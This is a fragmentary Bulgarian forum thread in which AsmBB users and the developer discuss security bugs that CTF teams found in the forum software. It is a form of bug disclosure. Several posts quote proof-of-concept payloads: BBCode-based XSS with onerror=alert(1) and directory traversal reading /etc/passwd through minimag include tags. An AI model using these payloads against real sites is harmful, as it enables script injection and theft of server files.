<bgdev />^free

;quote johnfound
;quote sisu
Аз споделих решенията на другите отбори в темата.
;end quote

Пропусна 796f75....

;quote johnfound
;quote johnfound
Интересно решение с RCE, което няма нужда да се оправя:

[https://twitter.com/wupco1996/status/1635863620868272128][[!https://imgur.com/5tvwYY6.png]]


Интересно...

;quote johnfound
;quote sisu
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/[email=%3Cczxc[]]qwe 404
;end quote

Ами че то...

;quote johnfound
;quote sisu
Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/[email=%3Cczxc[]]qwe 404
;end quote

Ами че то...

;quote johnfound
;quote sisu
Впрочем, asmbb не беше единствената асембли жертва [https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/][https://hxp.io/blog/105/hxp-CTF-2022-browser_insanity-writeup/] 
;end quote

Да-а-а, забелязах....

Все още е счупено: GET https://bgdev-free.asm32.info/johnfound-wnimanie-opasnost.7754/[email=%3Cczxc[]]qwe 404

С това привключваме текущо репортването на бъгове.

Отборите решили задачата:

;begin plain
true_web_assembly released	2023-03-10 21:23...

bluewater

[email="qwe@qw[email=<img src=f onerror=alert(1) zxc[]]qwe[/img]e.com"]qwe[/email][img][email=<czxc[]]qwe[/img]

Странен парсинг бъг

Credit: Copy ctf team

;quote hacker [?>:-("><]
?|r-l"AAAAAAAAAAAAAAAAA"=}[{_}+}:_}[/:}^'] /#:~,@DPr::(|r@@{Dlf"?.>r^`~>"^@l&&~<:l:|l:!}@== {-|@""!]l(-=>\o[,.+^r,r<:?$ l.'&/${_[:+^"(<:o:D:;$]|[l{D{~[= /)[&+[}fr<&"[l#'~ *_\...

Още един бъг но не успях да направя локал репро

1. create thread with title and...

Относно онзи бъг при чата, където user-ът използва unicode да inject-не unescaped <.

Credit Never Stop...

Пуснах нова тема, която уж би трябвало да повтори directory travesal от заглавието, таговете, етц на...

minimag:[include:../../../../../../../../../../etc/passwd],[minimag:[include:../../../../../../../../../../etc/passwd],[include:[include:../../../../../../../../../../etc/passwd]]

minimag:[include:../../../../../../../../../../etc/passwd]

minimag:[include:../../../../../../../../../../etc/passwd]

Нека видим

В локалния ми сетъп отнема няколко поста за да се появи. Можеш ли да погледнеш?

Отворих...

[[html:<img src=x onerror="alert(1)">]

Има някакъв бъг със самото заглавие но не ми е точно ясно какво става.

Тема: [...

minimag : [ include : ../../../../../../../../../etc/passwd ]

Credit: justCatTheFish ctf team

Имаш(е) directory traversal на няколко места. Случайно да си го оправил? [?:-P]